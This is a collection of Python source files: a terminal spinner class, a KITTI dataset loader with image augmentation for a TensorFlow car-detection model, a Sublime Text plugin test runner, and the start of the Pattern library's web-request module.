if all([is_text_type(spinner), spinner in Spinners.__members__]):
return Spinners[spinner].value
else:
return default_spinner
else:
return Spinners['line'].value
def _get_text(self, text):
"""Creates frames based on the selected animation
Returns
-------
self
"""
animation = self._animation
stripped_text = text.strip()
# Check which frame of the animation is the widest
max_spinner_length = max([len(i) for i in self._spinner['frames']])
# Subtract to the current terminal size the max spinner length
# (-1 to leave room for the extra space between spinner and text)
terminal_width = get_terminal_columns() - max_spinner_length - 1
text_length = len(stripped_text)
frames = []
if terminal_width < text_length and animation:
if animation == 'bounce':
"""
Make the text bounce back and forth
"""
for x in range(0, text_length - terminal_width + 1):
frames.append(stripped_text[x:terminal_width + x])
frames.extend(list(reversed(frames)))
            elif animation == 'marquee':
"""
Make the text scroll like a marquee
"""
stripped_text = stripped_text + ' ' + stripped_text[:terminal_width]
for x in range(0, text_length + 1):
frames.append(stripped_text[x:terminal_width + x])
elif terminal_width < text_length and not animation:
# Add ellipsis if text is larger than terminal width and no animation was specified
frames = [stripped_text[:terminal_width - 6] + ' (...)']
else:
frames = [stripped_text]
return {
'original': text,
'frames': frames
}
def clear(self):
"""Clears the line and returns cursor to the start.
of line
Returns
-------
self
"""
if not self._enabled:
return self
self._stream.write('\r')
self._stream.write(self.CLEAR_LINE)
return self
def _render_frame(self):
"""Renders the frame on the line after clearing it.
"""
frame = self.frame()
output = '\r{0}'.format(frame)
self.clear()
self._stream.write(output)
def render(self):
"""Runs the render until thread flag is set.
Returns
-------
self
"""
while not self._stop_spinner.is_set():
self._render_frame()
time.sleep(0.001 * self._interval)
return self
def frame(self):
"""Builds and returns the frame to be rendered
Returns
-------
self
"""
frames = self._spinner['frames']
frame = frames[self._frame_index]
if self._color:
frame = colored_frame(frame, self._color)
self._frame_index += 1
self._frame_index = self._frame_index % len(frames)
text_frame = self.text_frame()
return u'{0} {1}'.format(*[
(text_frame, frame)
if self._placement == 'right' else
(frame, text_frame)
][0])
def text_frame(self):
"""Builds and returns the text frame to be rendered
Returns
-------
self
"""
if len(self._text['frames']) == 1:
# Return first frame (can't return original text because at this point it might be ellipsed)
return self._text['frames'][0]
frames = self._text['frames']
frame = frames[self._text_index]
self._text_index += 1
self._text_index = self._text_index % len(frames)
return frame
def start(self, text=None):
"""Starts the spinner on a separate thread.
Parameters
----------
text : None, optional
Text to be used alongside spinner
Returns
-------
self
"""
if text is not None:
self.text = text
if not self._enabled or self._spinner_id is not None:
return self
if self._stream.isatty():
cursor.hide(stream=self._stream)
self._stop_spinner = threading.Event()
self._spinner_thread = threading.Thread(target=self.render)
        self._spinner_thread.daemon = True
self._render_frame()
self._spinner_id = self._spinner_thread.name
self._spinner_thread.start()
return self
def stop(self):
"""Stops the spinner and clears the line.
Returns
-------
self
"""
if not self._enabled:
return self
if self._spinner_thread:
self._stop_spinner.set()
self._spinner_thread.join()
self._frame_index = 0
self._spinner_id = None
self.clear()
if self._stream.isatty():
cursor.show(stream=self._stream)
return self
def succeed(self, text=None):
"""Shows and persists success symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside success symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.SUCCESS.value, text=text)
def fail(self, text=None):
"""Shows and persists fail symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside fail symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.ERROR.value, text=text)
def warn(self, text=None):
"""Shows and persists warn symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside warn symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.WARNING.value, text=text)
def info(self, text=None):
"""Shows and persists info symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside info symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.INFO.value, text=text)
def stop_and_persist(self, symbol=' ', text=None):
"""Stops the spinner and persists the final frame to be shown.
Parameters
----------
symbol : str, optional
Symbol to be shown in final frame
text: str, optional
Text to be shown in final frame
Returns
-------
self
"""
if not self._enabled:
return self
symbol = decode_utf_8_text(symbol)
if text is not None:
text = decode_utf_8_text(text)
else:
text = self._text['original']
text = text.strip()
self.stop()
output = u'{0} {1}\n'.format(*[
(text, symbol)
if self._placement == 'right' else
(symbol, text)
][0])
self._stream.write(output)
return self
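if __name__ == '__main__':
    # Minimal usage sketch (not part of the original module): exercises the
    # start()/succeed() API defined above; the text and spinner name are
    # arbitrary examples.
    spinner = Halo(text='Loading sample data', spinner='dots')
    spinner.start()
    time.sleep(2)  # simulate some work
    spinner.succeed('Done')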
|
kitti_input.py
|
import matplotlib
import itertools
import os
import random
from PIL import Image, ImageEnhance
import numpy as np
import matplotlib.pyplot as plt
import imageio
import tensorflow as tf
from include.utils.data_utils import (annotation_to_h5)
from include.utils.annolist import AnnotationLib as AnnoLib
import threading
from collections import namedtuple
import logging
import json
# namedtuple is a subclass of tuple
# define a namedtuple type fake_anno_object with a rects attribute
fake_anno = namedtuple('fake_anno_object', ['rects'])
matplotlib.use('Agg')
def _noise(image):
if np.random.uniform() < 0.5:
return image
scale = np.random.uniform(0, 32)
noise = np.random.normal(-scale, scale, size=image.shape)
image_new = np.clip(image.astype(np.float32) +
noise, 0, 255).astype(np.uint8)
return image_new
# image augmentation
def _enhance(image):
if np.random.uniform() < 0.5:
return image
    # convert the array to a PIL Image
image_obj = Image.fromarray(image)
    # convert the PIL Image back to an array:
# img = np.asarray(image_obj)
    # color enhancement
image_obj = ImageEnhance.Color(image_obj).enhance(np.random.uniform(0.5, 1.5))
    # brightness enhancement
image_obj = ImageEnhance.Brightness(image_obj).enhance(np.random.uniform(0.7, 1.3))
    # contrast enhancement
image_obj = ImageEnhance.Contrast(image_obj).enhance(np.random.uniform(0.7, 1.3))
# img = np.array(image_obj)
img = np.asarray(image_obj)
return img
def _projection(point, calib):
point_r = np.reshape(point, (3, ))
point_exp = np.reshape([point_r[0], point_r[1], point_r[2], 1], (4, 1))
point_proj = np.dot(calib, point_exp)
point_proj = point_proj[:2] / point_proj[2]
return np.reshape(point_proj, (2, ))
def _vis(im_obj, anno, index):
plt.figure(figsize=(12, 4))
    # clip values to the range 0-255
plt.imshow(np.clip(im_obj, 0, 255).astype(np.int32))
for r in anno.rects:
if r.classID == -1:
continue
plt.plot([r.x1, r.x2, r.x2, r.x1, r.x1],
[r.y1, r.y1, r.y2, r.y2, r.y1])
bottom_proj = _projection([r.x_3d, r.y_3d, r.z_3d], r.calib)
plt.scatter(bottom_proj[0], bottom_proj[1])
plt.show()
plt.savefig('/home/yappedyen/{}'.format(index))
plt.close()
return
# apply a random translation (jitter) to the image
def _jitter(im_obj, anno, jitter_pixel=24):
im = np.array(im_obj)
trans = np.random.normal(scale=jitter_pixel, size=(2, ))
height_jitter, width_jitter = np.clip(trans,
a_min=-jitter_pixel * 2,
a_max=+jitter_pixel * 2).astype(np.int32)
image_jitter = np.zeros(shape=np.shape(im), dtype=np.uint8)
image_means = im.mean(axis=(0, 1), keepdims=True).astype(np.uint8)
image_jitter += image_means
height, width, channels = np.shape(im)
left_new = max(0, width_jitter)
left_ori = max(0, -width_jitter)
right_new = min(width + width_jitter, width)
right_ori = min(width - width_jitter, width)
top_new = max(0, height_jitter)
top_ori = max(0, -height_jitter)
bottom_new = min(height + height_jitter, height)
bottom_ori = min(height - height_jitter, height)
image_jitter[top_new:bottom_new, left_new:right_new] = im[top_ori:bottom_ori, left_ori:right_ori]
new_rects = []
for r in anno.rects:
focal_length = r.calib.reshape(3, 4)[0, 0]
r.x_3d += r.z_3d * width_jitter / focal_length
r.y_3d += r.z_3d * height_jitter / focal_length
r.x1 = max(r.x1 + width_jitter, 0)
r.x2 = min(r.x2 + width_jitter, width)
r.y1 = max(r.y1 + height_jitter, 0)
r.y2 = min(r.y2 + height_jitter, height)
if r.x1 < r.x2 and r.y1 < r.y2:
new_rects.append(r)
anno.rects = new_rects
return image_jitter, anno
def _flip(im_obj, anno):
if np.random.uniform() < 0.5:
return im_obj, anno
    # flip each row left-to-right; the rows stay the same but the column order is reversed
im_obj = np.fliplr(im_obj)
height, width, channels = np.shape(im_obj)
for r in anno.rects:
calib = r.calib.reshape((3, 4))
focal_length = calib[0, 0]
ppoint_x = calib[0, 2]
trans_x = calib[0, 3]
delta_x = (r.z_3d*(width-1-2*ppoint_x) - 2*trans_x)/focal_length - 2*r.x_3d
r.x_3d += delta_x
r.x1, r.x2 = (width-1-r.x2, width-1-r.x1)
r.alpha = np.pi - r.alpha if r.alpha > 0 else -np.pi - r.alpha
return im_obj, anno
def read_kitti_anno(label_file, calib_file, detect_truck):
""" Reads a kitti annotation file.
Args:
label_file: Path to file
Returns:
Lists of rectangles: Cars and don't care area.
"""
"""
[['Car', '0.00', '0', '1.89', '561.93', '186.85', '698.62', '273.77',
'1.48', '1.51', '4.35', '0.55', '1.80', '14.99', '1.92'],
['Car', '0.00', '2', '1.65', '805.83', '179.99', '856.66', '218.93',
'1.47', '1.68', '3.88', '9.09', '1.78', '29.59', '1.94']]
"""
labels = [line.rstrip().split(' ') for line in open(label_file)]
# label_file = '/home/l4v/MonoGRNet/data/KittiBox/training/label_2/007474.txt'
# label_file_split = label_file.rstrip().split('/')
# index = label_file_split[-1].split('.')[0]
# import pdb
# pdb.set_trace()
calibs = [line.rstrip().split(' ') for line in open(calib_file)]
assert calibs[2][0] == 'P2:'
"""
[[7.215377e+02 0.000000e+00 6.095593e+02 4.485728e+01]
[0.000000e+00 7.215377e+02 1.728540e+02 2.163791e-01]
[0.000000e+00 0.000000e+00 1.000000e+00 2.745884e-03]]
"""
calib = np.reshape(calibs[2][1:], (3, 4)).astype(np.float32)
    # calib_pinv is the pseudo-inverse of calib
calib_pinv = np.linalg.pinv(calib)
rect_list = []
for label in labels:
        # only detect Car/Van/Truck
if not (label[0] == 'Car' or label[0] == 'Van' or
label[0] == 'Truck' or label[0] == 'DontCare'):
continue
notruck = not detect_truck
        if notruck and label[0] == 'Truck': # skip trucks
continue
if label[0] == 'DontCare':
class_id = -1
else:
class_id = 1
object_rect = AnnoLib.AnnoRect(
x1=float(label[4]), y1=float(label[5]),
x2=float(label[6]), y2=float(label[7]),
height=float(label[8]), width=float(label[9]),
length=float(label[10]), x=float(label[11]),
y=float(label[12]), z=float(label[13]),
alpha=float(label[14]), calib=calib,
calib_pinv=calib_pinv)
assert object_rect.x1 < object_rect.x2
assert object_rect.y1 < object_rect.y2
object_rect.classID = class_id
# The ground truth rotation (in camera coordinates) is converted to the local coordinates.
view_angle = np.arctan2(object_rect.z_3d, object_rect.x_3d)
object_rect.alpha += view_angle - np.pi * 0.5
rect_list.append(object_rect)
return rect_list
# rescale the bounding boxes
def _rescale_boxes(current_shape, anno, target_height, target_width):
x_scale = target_width / float(current_shape[1])
y_scale = target_height / float(current_shape[0])
z_3d_scale = ((x_scale**2 + y_scale**2)*0.5)**0.5
for r in anno.rects:
assert r.x1 < r.x2
r.x1 *= x_scale
r.x2 *= x_scale
assert r.x1 < r.x2
r.y1 *= y_scale
r.y2 *= y_scale
r.xy_scale = np.array([x_scale, y_scale], dtype=np.float32)
return anno
# generate the mask
def _generate_mask(hypes, ignore_rects):
width = hypes["image_width"]
height = hypes["image_height"]
grid_width = hypes["grid_width"]
grid_height = hypes["grid_height"]
mask = np.ones([grid_height, grid_width])
if not hypes['use_mask']:
return mask
for rect in ignore_rects:
left = int((rect.x1+2)/width*grid_width)
right = int((rect.x2-2)/width*grid_width)
top = int((rect.y1+2)/height*grid_height)
bottom = int((rect.y2-2)/height*grid_height)
for x in range(left, right+1):
for y in range(top, bottom+1):
mask[y, x] = 0
return mask
def _load_kitti_txt(kitti_txt, hypes, jitter=False, random_shuffel=True):
"""
Take the txt file and net configuration and create a generator
that outputs a jittered version of a random image from the annolist
that is mean corrected.
Args:
kitti_txt: path_to_txt
hypes: hypes
jitter: Image preprocessing
random_shuffel: Random sorting of images
"""
# /home/l4v/MonoGRNet/data/KittiBox
base_path = os.path.realpath(os.path.dirname(kitti_txt))
# ['training/image_2/00445.png training/label_2/00445.txt',...,'...']
files = [line.rstrip() for line in open(kitti_txt)]
if hypes['data']['truncate_data']:
files = files[:10]
random.seed(0)
    # infinite iterator
    # keeps feeding data into the queue
for epoch in itertools.count():
if random_shuffel:
            # shuffle all elements of the sequence
random.shuffle(files)
for file in files:
image_file, gt_image_file = file.split(" ") # image_address, label_address
image_file_split = image_file.split('/')
index = image_file_split[-1].split('.')[0] # 007474 image_index
# /home/l4v/MonoGRNet/data/KittiBox/training/calib/007474.txt
calib_file = os.path.join(base_path, image_file_split[0], 'calib', index + '.txt')
            # the assert raises an exception when the file is missing
assert os.path.exists(calib_file), \
"File does not exist: %s" % calib_file
# /home/l4v/MonoGRNet/data/KittiBox/training/image_2/007474.png
image_file = os.path.join(base_path, image_file)
assert os.path.exists(image_file), \
"File does not exist: %s" % image_file
# /home/l4v/MonoGRNet/data/KittiBox/training/label_2/007474.txt
gt_image_file = os.path.join(base_path, gt_image_file)
assert os.path.exists(gt_image_file), \
"File does not exist: %s" % gt_image_file
            # read the label and calib files into rect_list
            # (the list of annotated rectangles for this image)
rect_list = read_kitti_anno(gt_image_file, calib_file,
detect_truck=hypes['detect_truck'])
anno = AnnoLib.Annotation()
anno.rects = rect_list
im = imageio.imread(image_file)
if im.shape[2] == 4:
im = im[:, :, :3]
if jitter:
                # flip the image
im, anno = _flip(im, anno)
                # jitter the image
im, anno = _jitter(im, anno)
                # enhance the image and add noise
im = _noise(_enhance(im))
# _vis(im, anno, index)
            # resize the image and rescale the boxes to the target size
anno = _rescale_boxes(im.shape, anno, hypes["image_height"], hypes["image_width"])
im = Image.fromarray(im).resize(size=(hypes["image_width"], hypes["image_height"]))
            # only keep annotations with classID == 1
pos_list = [rect for rect in anno.rects if rect.classID == 1]
            # store them in the namedtuple
pos_anno = fake_anno(pos_list)
# boxes: [1, grid_height*grid_width, 11, max_len, 1]
# for each cell, this array contains the ground truth boxes around it (within focus area,
# defined by center distance)
# confs: [1, grid_height*grid_width, 1, max_len, 1]
# record the valid boxes, since max_len is greater than the number of ground truth boxes
boxes, confs, calib, calib_pinv, xy_scale = annotation_to_h5(hypes, pos_anno, hypes["grid_width"],
hypes["grid_height"], hypes["rnn_len"])
# masks are zero in "Don't care" area
mask_list = [rect for rect in anno.rects if rect.classID == -1]
mask = _generate_mask(hypes, mask_list)
boxes = boxes.reshape([hypes["grid_height"], hypes["grid_width"], 11])
confs = confs.reshape(hypes["grid_height"], hypes["grid_width"])
calib = calib.reshape(hypes["grid_height"], hypes["grid_width"], 3, 4)
xy_scale = xy_scale.reshape(hypes["grid_height"], hypes["grid_width"], 2)
calib_pinv = calib_pinv.reshape(hypes['grid_height'], hypes['grid_width'], 4, 3)
            # yield works like return, except that the generator resumes right
            # after the yield on the next iteration. The first call must use
            # next() (or send(None)); keep calling next() -- or iterate with a
            # for loop -- to resume from the last yield until it is exhausted.
yield {"image": im, "boxes": boxes, "confs": confs, "calib": calib, "calib_pinv": calib_pinv,
"xy_scale": xy_scale, "rects": pos_list, "mask": mask}
def _make_sparse(n, d):
v = np.zeros((d,), dtype=np.float32)
v[n] = 1.
return v
def create_queues(hypes, phase):
"""Create Queues."""
dtypes = [tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32]
# grid_size = hypes['grid_width'] * hypes['grid_height']
shapes = ([hypes['image_height'], hypes['image_width'], 3], # image
[hypes['grid_height'], hypes['grid_width']], # confs
              [hypes['grid_height'], hypes['grid_width'], 11], # the 11 box parameters
[hypes['grid_height'], hypes['grid_width']], # mask
[hypes['grid_height'], hypes['grid_width'], 3, 4], # calib
[hypes['grid_height'], hypes['grid_width'], 4, 3], # calib_pinv
              [hypes['grid_height'], hypes['grid_width'], 2]) # x_scale, y_scale scaling factors
capacity = 32
    # create a FIFO queue to hold the data
q = tf.queue.FIFOQueue(capacity=capacity, dtypes=dtypes, shapes=shapes)
return q
def _processe_image(hypes, image):
    # Because these operations are not commutative, consider randomizing
    # the order of their operation.
augment_level = hypes['augment_level']
if augment_level > 0:
image = tf.image.random_brightness(image, max_delta=30)
image = tf.image.random_contrast(image, lower=0.75, upper=1.25)
if augment_level > 1:
image = tf.image.random_saturation(image, lower=0.5, upper=1.6)
image = tf.image.random_hue(image, max_delta=0.15)
    # clamp pixel values to the valid [0, 255] range
image = tf.minimum(image, 255.0)
image = tf.maximum(image, 0)
return image
def start_enqueuing_threads(hypes, q, phase, sess):
"""Start enqueuing threads."""
# Creating Placeholder for the Queue
    # placeholders
x_in = tf.placeholder(tf.float32)
confs_in = tf.placeholder(tf.float32)
boxes_in = tf.placeholder(tf.float32)
mask_in = tf.placeholder(tf.float32)
calib_in = tf.placeholder(tf.float32)
calib_pinv_in = tf.placeholder(tf.float32)
xy_scale_in = tf.placeholder(tf.float32)
# Creating Enqueue OP
    # op that enqueues the elements
enqueue_op = q.enqueue((x_in, confs_in, boxes_in, mask_in, calib_in, calib_pinv_in, xy_scale_in))
def make_feed(data):
return {x_in: data['image'],
confs_in: data['confs'],
boxes_in: data['boxes'],
mask_in: data['mask'],
calib_in: data['calib'],
calib_pinv_in: data['calib_pinv'],
xy_scale_in: data['xy_scale']}
def thread_loop(sess, enqueue_op, gen):
        # feed_dict assigns values to the placeholder tensors and lets the
        # caller override tensor values in the graph;
        # feed the queue by iterating over the generator
for d in gen:
sess.run(enqueue_op, feed_dict=make_feed(d))
data_file = hypes["data"]['%s_file' % phase] # train_file
data_dir = hypes['dirs']['data_dir']
data_file = os.path.join(data_dir, data_file) # ../data/KittiBox/train.txt
# _load_kitti_txt returns a generator
gen = _load_kitti_txt(data_file, hypes, jitter={'train': hypes['solver']['use_jitter'], 'val': False}[phase])
# Prime the generator with next(); the first yielded sample is assigned to data.
data = next(gen)
sess.run(enqueue_op, feed_dict=make_feed(data))
# Start a worker thread that keeps loading data into the queue.
t = threading.Thread(target=thread_loop, args=(sess, enqueue_op, gen))
# daemon thread: it will not keep the process alive when the main thread exits
t.daemon = True
# start the loader thread
t.start()
def inputs(hypes, q, phase):
if phase == 'val':
image, confidences, boxes, mask, calib, calib_pinv, xy_scale = q.dequeue()
image = tf.expand_dims(image, 0)
confidences = tf.expand_dims(confidences, 0)
boxes = tf.expand_dims(boxes, 0)
mask = tf.expand_dims(mask, 0)
calib = tf.expand_dims(calib, 0)
calib_pinv = tf.expand_dims(calib_pinv, 0)
xy_scale = tf.expand_dims(xy_scale, 0)
return image, (confidences, boxes, mask, calib, calib_pinv, xy_scale)
elif phase == 'train':
# dequeue_many(n) removes n elements from the queue and concatenates them into a batch.
# image=Tensor(shape=(8,384,1248,3))
# confidences=Tensor(shape=(8,12,39))
# boxes=Tensor(shape=(8,12,39,11))
# mask=Tensor(shape=(8,12,39))
# calib=Tensor(shape=(8,12,39,3,4))
# calib_pinv=Tensor(shape=(8,12,39,4,3))
# xy_scale=Tensor(shape=(8,12,39,2))
image, confidences, boxes, mask, calib, calib_pinv, xy_scale = q.dequeue_many(hypes['batch_size'])
image = _processe_image(hypes, image)
return image, (confidences, boxes, mask, calib, calib_pinv, xy_scale)
else:
assert("Bad phase: {}".format(phase))
# test the gen
if __name__ == '__main__':
with open("../hypes/kittiBox.json", 'r') as f:
logging.info("f: %s", f)
hype = json.load(f)
data_file1 = hype["data"]['%s_file' % 'train'] # train_file
data_dir1 = hype['dirs']['data_dir']
data_file1 = os.path.join(data_dir1, data_file1)
gen1 = _load_kitti_txt(data_file1, hype, jitter=False)
data1 = next(gen1)
|
test_runner.py
|
from threading import Thread
import contextlib
import os
import unittest
import sublime
import sublime_plugin
class __vi_tests_write_buffer(sublime_plugin.TextCommand):
"""Replaces the buffer's content with the specified `text`.
`text`: Text to be written to the buffer.
"""
def run(self, edit, text=''):
self.view.replace(edit, sublime.Region(0, self.view.size()), text)
class __vi_tests_erase_all(sublime_plugin.TextCommand):
"""Replaces the buffer's content with the specified `text`.
"""
def run(self, edit):
self.view.erase(edit, sublime.Region(0, self.view.size()))
class OutputPanel(object):
def __init__(self, name,
file_regex='',
line_regex='',
base_dir=None,
word_wrap=False,
line_numbers=False,
gutter=False,
scroll_past_end=False,
syntax='',
):
self.name = name
self.window = sublime.active_window()
if not hasattr(self, 'output_view'):
# Try not to call get_output_panel until the regexes are assigned
self.output_view = self.window.create_output_panel(self.name)
# Default to the current file directory
if (not base_dir and self.window.active_view() and
self.window.active_view().file_name()):
base_dir = os.path.dirname(
self.window.active_view().file_name()
)
self.output_view.settings().set('result_file_regex', file_regex)
self.output_view.settings().set('result_line_regex', line_regex)
self.output_view.settings().set('result_base_dir', base_dir)
self.output_view.settings().set('word_wrap', word_wrap)
self.output_view.settings().set('line_numbers', line_numbers)
self.output_view.settings().set('gutter', gutter)
self.output_view.settings().set('scroll_past_end', scroll_past_end)
self.output_view.settings().set('syntax', syntax)
# Call create_output_panel a second time after assigning the above
# settings, so that it'll be picked up as a result buffer
self.window.create_output_panel(self.name)
def write(self, s):
f = lambda: self.output_view.run_command('append', {'characters': s})
sublime.set_timeout(f, 0)
def flush(self):
pass
def show(self):
self.window.run_command(
'show_panel', {'panel': 'output.' + self.name}
)
def close(self):
pass
class RunVintageousTests(sublime_plugin.WindowCommand):
'''
Runs tests and displays the results.
- Do not use Sublime Text while tests are running.
@working_dir
Required. Should be the parent of the top-level directory for `tests`.
@loader_pattern
Optional. Only run tests matching this glob.
@tests_dir
Name of the directory containing tests.
@active_file_only
Optional. Only run tests in the active file in ST. Shadows
@loader_pattern.
To use this runner conveniently, open the command palette and select one
of the `Build: Vintageous - Test *` commands.
'''
def run(self, working_dir,
loader_pattern="test*.py",
tests_dir="tests",
**kwargs):
assert os.path.exists(working_dir), 'working_dir must exist'
with self.chdir(working_dir):
p = os.path.join(os.getcwd(), tests_dir)
patt = loader_pattern
# TODO(guillermooo): I can't get $file to expand in the build
# system. It should be possible to make the following code simpler
# with it.
if kwargs.get('active_file_only') is True:
patt = os.path.basename(self.window.active_view().file_name())
# run text-based tests
if patt.endswith(('.cmd-test', '.cmd-test-solo')):
patt = 'test_all_cmds.py'
suite = unittest.TestLoader().discover(p, pattern=patt)
file_regex = r'^\s*File\s*"([^.].*?)",\s*line\s*(\d+),.*$'
display = OutputPanel('vintageous.tests',
file_regex=file_regex,
word_wrap=True
)
display.show()
runner = unittest.TextTestRunner(stream=display, verbosity=1)
def run_and_display():
runner.run(suite)
# XXX: If we don't do this, custom mappings won't be available
# after running the test suite.
self.window.run_command('reset_vintageous')
Thread(target=run_and_display).start()
@contextlib.contextmanager
def chdir(self, path=None):
old_path = os.getcwd()
if path:
assert os.path.exists(path), "'path' is invalid {}".format(path)
os.chdir(path)
yield
if path is not None:
os.chdir(old_path)
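# A minimal invocation sketch (commented out; normally this command is triggered from
# the command palette / build system as described in the docstring above, and the
# arguments below are illustrative placeholders):
#sublime.active_window().run_command('run_vintageous_tests', {
#    'working_dir': '/path/to/Packages/Vintageous',
#    'loader_pattern': 'test_keys.py',
#})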
|
__init__.py
|
#### PATTERN | WEB #################################################################################
# Copyright (c) 2010 University of Antwerp, Belgium
# Author: Tom De Smedt <tom@organisms.be>
# License: BSD (see LICENSE.txt for details).
# http://www.clips.ua.ac.be/pages/pattern
####################################################################################################
# Python API interface for various web services (Google, Twitter, Wikipedia, ...)
# sgmllib is removed in Python 3; a deprecation warning is issued in Python 2.6+. Ignore for now.
import warnings; warnings.filterwarnings(action='ignore', category=DeprecationWarning, module="sgmllib")
import threading
import time
import os
import socket, urlparse, urllib, urllib2
import base64
import htmlentitydefs
import sgmllib
import re
import xml.dom.minidom
import StringIO
import bisect
import new
import api
import feed
import oauth
import json
import locale
from feed import feedparser
from soup import BeautifulSoup
try:
# Import persistent Cache.
# If this module is used separately, a dict is used (i.e. for this Python session only).
from cache import Cache, cache, TMP
except:
cache = {}
try:
from imap import Mail, MailFolder, Message, GMAIL
from imap import MailError, MailServiceError, MailLoginError, MailNotLoggedIn
from imap import FROM, SUBJECT, DATE, BODY, ATTACHMENTS
except:
pass
try:
MODULE = os.path.dirname(os.path.abspath(__file__))
except:
MODULE = ""
#### UNICODE #######################################################################################
def decode_utf8(string):
""" Returns the given string as a unicode string (if possible).
"""
if isinstance(string, str):
for encoding in (("utf-8",), ("windows-1252",), ("utf-8", "ignore")):
try:
return string.decode(*encoding)
except:
pass
return string
return unicode(string)
def encode_utf8(string):
""" Returns the given string as a Python byte string (if possible).
"""
if isinstance(string, unicode):
try:
return string.encode("utf-8")
except:
return string
return str(string)
u = decode_utf8
s = encode_utf8
# For clearer source code:
bytestring = s
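# For example (illustrative):
#print u("caf\xc3\xa9") # UTF-8 byte string => u"café"
#print s(u"café")       # unicode string => UTF-8 byte string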
#### ASYNCHRONOUS REQUEST ##########################################################################
class AsynchronousRequest:
def __init__(self, function, *args, **kwargs):
""" Executes the function in the background.
AsynchronousRequest.done is False as long as it is busy, but the program will not halt in the meantime.
AsynchronousRequest.value contains the function's return value once done.
AsynchronousRequest.error contains the Exception raised by an erroneous function.
For example, this is useful for running live web requests while keeping an animation running.
For good reasons, there is no way to interrupt a background process (i.e. Python thread).
You are responsible for ensuring that the given function doesn't hang.
"""
self._response = None # The return value of the given function.
self._error = None # The exception (if any) raised by the function.
self._time = time.time()
self._function = function
self._thread = threading.Thread(target=self._fetch, args=(function,)+args, kwargs=kwargs)
self._thread.start()
def _fetch(self, function, *args, **kwargs):
""" Executes the function and sets AsynchronousRequest.response.
"""
try:
self._response = function(*args, **kwargs)
except Exception, e:
self._error = e
def now(self):
""" Waits for the function to finish and yields its return value.
"""
self._thread.join(); return self._response
@property
def elapsed(self):
return time.time() - self._time
@property
def done(self):
return not self._thread.isAlive()
@property
def value(self):
return self._response
@property
def error(self):
return self._error
def __repr__(self):
return "AsynchronousRequest(function='%s')" % self._function.__name__
def asynchronous(function, *args, **kwargs):
""" Returns an AsynchronousRequest object for the given function.
"""
return AsynchronousRequest(function, *args, **kwargs)
send = asynchronous
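# A minimal usage sketch (commented out; the URL is illustrative):
#request = asynchronous(URL("http://www.clips.ua.ac.be").download)
#while not request.done:
#    time.sleep(0.1) # Do other work (e.g., keep an animation running) in the meantime.
#print request.error or request.value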
#### URL ###########################################################################################
# User agent and referrer.
# Used to identify the application accessing the web.
USER_AGENT = "Pattern/2.3 +http://www.clips.ua.ac.be/pages/pattern"
REFERRER = "http://www.clips.ua.ac.be/pages/pattern"
# Mozilla user agent.
# Websites can include code to block out any application except browsers.
MOZILLA = "Mozilla/5.0"
# HTTP request method.
GET = "get" # Data is encoded in the URL.
POST = "post" # Data is encoded in the message body.
# URL parts.
# protocol://username:password@domain:port/path/page?query_string#anchor
PROTOCOL, USERNAME, PASSWORD, DOMAIN, PORT, PATH, PAGE, QUERY, ANCHOR = \
"protocol", "username", "password", "domain", "port", "path", "page", "query", "anchor"
# MIME type.
MIMETYPE_WEBPAGE = ["text/html"]
MIMETYPE_STYLESHEET = ["text/css"]
MIMETYPE_PLAINTEXT = ["text/plain"]
MIMETYPE_PDF = ["application/pdf"]
MIMETYPE_NEWSFEED = ["application/rss+xml", "application/atom+xml"]
MIMETYPE_IMAGE = ["image/gif", "image/jpeg", "image/png", "image/tiff"]
MIMETYPE_AUDIO = ["audio/mpeg", "audio/mp4", "audio/x-aiff", "audio/x-wav"]
MIMETYPE_VIDEO = ["video/mpeg", "video/mp4", "video/quicktime"]
MIMETYPE_ARCHIVE = ["application/x-stuffit", "application/x-tar", "application/zip"]
MIMETYPE_SCRIPT = ["application/javascript", "application/ecmascript"]
def extension(filename):
""" Returns the extension in the given filename: "cat.jpg" => ".jpg".
"""
return os.path.splitext(filename)[1]
def urldecode(query):
""" Inverse operation of urllib.urlencode.
Returns a dictionary of (name, value)-items from a URL query string.
"""
def _format(s):
if s == "None":
return None
if s.isdigit():
return int(s)
try: return float(s)
except:
return s
query = [(kv.split("=")+[None])[:2] for kv in query.lstrip("?").split("&")]
query = [(urllib.unquote_plus(bytestring(k)), urllib.unquote_plus(bytestring(v))) for k, v in query]
query = [(u(k), u(v)) for k, v in query]
query = [(k, _format(v) or None) for k, v in query]
query = dict([(k,v) for k, v in query if k != ""])
return query
url_decode = urldecode
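# For example (illustrative):
#print urldecode("?page=1&q=cats") # => {u"page": 1, u"q": u"cats"}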
def proxy(host, protocol="https"):
""" Returns the value for the URL.open() proxy parameter.
- host: host address of the proxy server.
"""
return (host, protocol)
class URLError(Exception):
pass # URL contains errors (e.g. a missing t in htp://).
class URLTimeout(URLError):
pass # URL takes too long to load.
class HTTPError(URLError):
pass # URL causes an error on the contacted server.
class HTTP301Redirect(HTTPError):
pass # Too many redirects.
# The site may be trying to set a cookie and waiting for you to return it,
# or taking other measures to discern a browser from a script.
# For specific purposes you should build your own urllib2.HTTPRedirectHandler
# and pass it to urllib2.build_opener() in URL.open()
class HTTP400BadRequest(HTTPError):
pass # URL contains an invalid request.
class HTTP401Authentication(HTTPError):
pass # URL requires a login and password.
class HTTP403Forbidden(HTTPError):
pass # URL is not accessible (user-agent?)
class HTTP404NotFound(HTTPError):
pass # URL doesn't exist on the internet.
class HTTP420Error(HTTPError):
pass # Used by Twitter for rate limiting.
class HTTP500InternalServerError(HTTPError):
pass # Generic server error.
class URL:
def __init__(self, string=u"", method=GET, query={}):
""" URL object with the individual parts available as attributes:
For protocol://username:password@domain:port/path/page?query_string#anchor:
- URL.protocol: http, https, ftp, ...
- URL.username: username for restricted domains.
- URL.password: password for restricted domains.
- URL.domain : the domain name, e.g. nodebox.net.
- URL.port : the server port to connect to.
- URL.path : the server path of folders, as a list, e.g. ['news', '2010']
- URL.page : the page name, e.g. page.html.
- URL.query : the query string as a dictionary of (name, value)-items.
- URL.anchor : the page anchor.
If method is POST, the query string is sent with HTTP POST.
"""
